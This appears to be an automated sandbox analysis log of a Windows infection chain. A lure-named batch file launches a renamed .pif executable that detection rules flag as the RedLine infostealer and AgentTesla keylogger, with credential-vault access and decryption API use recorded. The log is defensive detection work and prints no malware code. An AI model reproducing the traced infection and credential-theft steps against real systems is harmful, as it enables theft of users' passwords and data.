                  Source: 9.1.xrbjyllC.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 17.1.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 11.2.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.1.xrbjyllC.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 17.2.xrbjyllC.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 11.1.xrbjyllC.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 11.2.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 17.1.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 11.1.xrbjyllC.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 17.2.xrbjyllC.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 00000009.00000002.1859312320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000011.00000002.2918780561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0000000B.00000002.2004085524.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 00000011.00000001.1996288631.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winBAT@25/11@3/3
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031C7FD4 GetDiskFreeSpaceA,3_2_031C7FD4
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,9_2_004019F0
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031D6DC8 CoCreateInstance,3_2_031D6DC8
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,9_2_004019F0
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\PNOJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6260:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5956:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_03
                  Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\user\AppData\Local\Temp\CAB06544.TMPJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" "
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCommand line argument: 08A9_2_00413780
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCommand line argument: 08A9_2_00413780
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCommand line argument: 08A9_1_00413780
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCommand line argument: 08A11_2_00413780
